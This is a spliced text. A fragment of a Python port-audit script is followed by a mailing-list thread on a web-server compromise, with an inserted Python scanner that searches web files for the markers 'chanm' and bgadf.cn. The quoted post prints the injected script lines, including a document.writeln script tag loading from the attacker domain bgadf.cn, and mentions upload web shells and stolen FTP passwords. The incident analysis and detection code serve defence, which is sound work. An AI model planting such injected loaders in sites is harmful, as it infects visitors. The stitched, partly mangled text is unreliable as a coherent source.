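    """Return {port: service} for rows whose state is exactly 'open'."""
    ports = {}
    for line in text.splitlines():
        match = ROW.match(line.strip())
        if match and match.group(3) == "open":
            ports[int(match.group(1))] = match.group(4)
    return ports


def audit(text, intended=INTENDED_PUBLIC):
    """Return (port, service, verdict) for each open port not in the baseline."""
    findings = []
    for port, service in sorted(parse_open_ports(text).items()):
        if port in intended:
            continue
        if port in NOT_FOR_PUBLIC:
            verdict = "restrict: not for public exposure"
        elif service == "unknown":
            verdict = "identify the listening program"
        else:
            verdict = "confirm it is needed or close it"
        findings.append((port, service, verdict))
    return findings
```
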
Re: malware patterns
OK, here's what to do. Search your entire code base for any web accessible script containing the text "chanm". I found a jsp and a cfm file, both with the ability to upload and manipulate files on a server. If you do find a file like this, please send me the code so I can compare it to what I have and get a better search pattern.

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:326398
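The code-base search described above, as an added example that is not code from the thread: it walks a web root and reports, per file and line, every web-served file containing the "chanm" string or the bgadf.cn domain reported elsewhere in this thread. The `.jsp` extension, the function names and the sample tree are assumptions made for the example.

```python
import tempfile
from pathlib import Path

# Markers named in this thread; matched case-insensitively on raw bytes.
MARKERS = (b"chanm", b"bgadf.cn")
# Affected extensions listed in the thread, plus .jsp for the JSP script.
WEB_EXTENSIONS = {".cfm", ".cfml", ".htm", ".html", ".js", ".jsp"}

def scan_file(path):
    """Return [(line_number, marker), ...]; bytes mode keeps encrypted files searchable."""
    hits = []
    with open(path, "rb") as fh:
        for number, line in enumerate(fh, start=1):
            lowered = line.lower()
            hits += [(number, m.decode()) for m in MARKERS if m in lowered]
    return hits

def scan_tree(web_root):
    """Return {relative_path: hits} for web-served files containing a marker."""
    findings = {}
    for path in sorted(Path(web_root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in WEB_EXTENSIONS:
            continue
        try:
            hits = scan_file(path)
        except OSError:
            continue  # unreadable file: skip it rather than abort the sweep
        if hits:
            findings[path.relative_to(web_root).as_posix()] = hits
    return findings

def build_sample_tree(root):
    """Write a constructed sample tree (not incident data) for a dry run."""
    samples = {
        "index.cfm": b"<!-- http://BGADF.cn -->\n<cfoutput>hi</cfoutput>\n",
        "admin/tool.jsp": b"<%-- header --%>\n<% String chanm = \"x\"; %>\n",
        "clean.html": b"<html><body>ok</body></html>\n",
        "notes.txt": b"chanm in a file the web server does not execute\n",
    }
    for rel, data in samples.items():
        target = Path(root, rel)
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(data)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for rel, hits in scan_tree(tmp).items():
            print(rel, hits)
```

A hit on line 1 of a non-.js file is consistent with the prepended line reported in this thread; hits deeper in a file need manual review.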
Re: malware patterns
I've seen this sort of attack before on a client's server that they were hosting at their office. The malware that did it used a stolen FTP password to log in as an actual user and modify every HTML file on their server. We found it by reviewing the FTP server logs and saw that their general user account was downloading and uploading the modified files, as well as searching for files with specific extensions (.html, .php, etc).

I know the FileZilla FTP server does support IP restrictions, so maybe consider implementing those if you haven't already to only allow your IP to access it.

Just a thought!

Warm regards,
Jordan Michaels
Vivio Technologies
http://www.viviotech.net/
Open BlueDragon Steering Committee
Adobe Solution Provider

Michael Dinowitz wrote:
> The recent attack on House of Fusion resulted in some useful
> information as to what you should look for. In general, all or most of
> the files with the following extensions were affected:
> .cfm
> .cfml
> .htm
> .html
> .js
> The following line of code was prepended to all files other than .js
> http://bgadf.cn>
> This was added to both unencrypted and encrypted files, meaning the
> cfide was affected. Luckily, the line was exactly as stated above with
> a new line after it. This allows for a global find/replace to remove
> it. Unfortunately, this seems to have killed my cfide/administrator,
> requiring me to replace it with a copy from another machine.
> The .js files had the following line of code added:
> document.writeln ("http://bgadf.cn\";><\/script>");
> Again, a search and replace was able to remove it across the board. An
> important note is that the .js files in the cfide (the ajax files)
> were affected and had to be repaired.
> Finally, the following line of code was buried within at least one file:
>